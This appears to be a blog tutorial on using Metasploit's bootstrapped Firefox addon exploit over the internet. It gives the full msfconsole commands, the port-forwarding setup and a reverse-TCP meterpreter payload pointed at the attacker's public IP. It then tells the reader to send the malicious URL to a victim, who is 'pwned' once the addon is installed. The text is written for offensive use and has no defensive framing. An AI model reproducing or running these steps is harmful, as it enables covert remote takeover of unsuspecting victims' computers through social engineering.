Well in this tutorial, i will show you how to use metasploit's bootstrapped firefox addon over WAN (wide area network) or Internet.
Requirements:
- Router (With Port Forwarding Support)
- Metasploit Framework
I will use teamviewer to show you remote machine's ip and activities status.
Attacker's Public IP: 182.186.248.2
Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X
Step1:
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
- webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
- payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Now start msfconsole and use following exploit:
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:
set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2 set lport 7777
Step3:
Now send this server's address to victim:
http://182.186.248.2:8080/
When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)
If you feel some trouble while following tutorial you may ask me in comments.
No comments:
Post a Comment